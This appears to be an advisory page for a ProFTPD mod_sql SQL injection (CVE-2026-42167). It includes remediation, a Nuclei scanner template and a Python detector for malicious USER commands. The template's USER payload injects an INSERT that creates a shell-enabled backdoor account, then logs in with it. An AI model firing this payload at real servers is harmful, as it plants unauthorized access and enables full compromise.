
ProFTPD mod_sql - Preauth User Backdoor

CVE-2026-42167
Verified

Description

ProFTPD mod_sql before 1.3.10rc1 contains a remote code execution vulnerability caused by unsafe username handling with SQL backend commands in USER request logging expansions. Remote attackers can execute arbitrary code; exploitation requires a SQL backend that allows commands.

Severity

High

CVSS Score

9.8

Exploit Probability

6%

Affected Product

proftpd

Published Date

April 29, 2026

Template Author

pussycat0x

CVE-2026-42167.yaml
id: CVE-2026-42167

info:
  name: ProFTPD mod_sql - Preauth User Backdoor
  author: pussycat0x
  severity: high
  description: |
    ProFTPD mod_sql before 1.3.10rc1 contains a remote code execution caused by unsafe username handling with SQL backend commands in USER request logging expansions, letting remote attackers execute arbitrary code, exploit requires SQL backend allowing commands.
  remediation: |
    Upgrade to version 1.3.10rc1 or later.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  reference:
    - https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc
    - https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42167
    epss-score: 0.06463
    epss-percentile: 0.91185
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    vendor: proftpd
    product: proftpd
    shodan-query: "220 ProFTPD"
  tags: cve,cve2026,proftpd,ftp,sqli,rce,network

flow: tcp(1) && tcp(2)

tcp:
  - inputs:
      - data: "USER ', null, null); INSERT INTO users VALUES($${{randstr}}$$, $${{randstr}}$$, 0, 0, $$/$$, $$/bin/bash$$); --'\r\n"
        read: 1024
      - data: "PASS test\r\n"

    host:
      - "{{Hostname}}"
    port: 21,2121
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "220 ProFTPD"
        internal: true

  - inputs:
      - data: "USER {{randstr}}\r\n"
        read: 1024
      - data: "PASS {{randstr}}\r\n"
        read: 1024
      - data: "QUIT\r\n"

    host:
      - "{{Hostname}}"
    port: 21,2121
    read-size: 2048

    matchers-condition: and
    matchers:
      - type: word
        part: raw
        words:
          - "230"

      - type: word
        part: raw
        words:
          - "Login incorrect"
          - "Anonymous login"
        condition: or
        negative: true

    extractors:
      - type: regex
        part: raw
        regex:
          - '230.*logged in'
# digest: 4b0a004830460221009f4f4383bc043f973d6f8913a170b3a53791428f64d19adb34aad44c48528f72022100f14b9f6c8a5af0282563df27fa4a320f1a45d9398074eec69e718820a8417f53:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-42167
CWE ID:
cwe-89

References

https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

Remediation Steps

Upgrade to version 1.3.10rc1 or later.
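
For detection while the upgrade is rolled out, the following is an added example, not part of the original template or of ProFTPD: it classifies FTP `USER` commands taken from captured control-channel traffic and flags arguments that carry the SQL statement shape the template sends. The login-name allowlist, the function names and the sample lines are assumptions made for illustration.

```python
import re

# Assumption: local policy limits FTP login names to this conservative set.
SAFE_USER = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")
# Tokens needed to close a quoted SQL value and append a statement.
SQL_META = re.compile(r"['\";]|--|/\*|\$\$")
SQL_VERB = re.compile(
    r"\b(insert|update|delete|select|union|drop|create|alter|copy)\b", re.I)


def classify_user_command(line):
    """Return 'ok', 'suspicious' or 'sqli' for one FTP control-channel line."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    if verb.upper() != "USER" or SAFE_USER.match(arg):
        return "ok"
    if SQL_META.search(arg) and SQL_VERB.search(arg):
        return "sqli"
    return "suspicious"  # outside the allowlist, but no SQL statement shape


def scan(lines):
    """Return (line_number, verdict, command) for every non-ok USER command."""
    return [(n, verdict, line.rstrip("\r\n"))
            for n, line in enumerate(lines, 1)
            if (verdict := classify_user_command(line)) != "ok"]


# Constructed sample of client-to-server lines; line 3 has the shape of the
# template's first USER input, with the random strings replaced by "x".
SAMPLE = [
    "USER alice\r\n",
    "PASS example-password\r\n",
    "USER ', null, null); INSERT INTO users VALUES($$x$$, $$x$$, 0, 0, "
    "$$/$$, $$/bin/bash$$); --'\r\n",
    "USER bob smith\r\n",
    "USER o'brien\r\n",
]

if __name__ == "__main__":
    for n, verdict, cmd in scan(SAMPLE):
        print(f"line {n}: {verdict}: {cmd}")
```

A `sqli` verdict followed by a successful login (`230`) for a previously unseen account on the same server matches the two-step flow the template checks for.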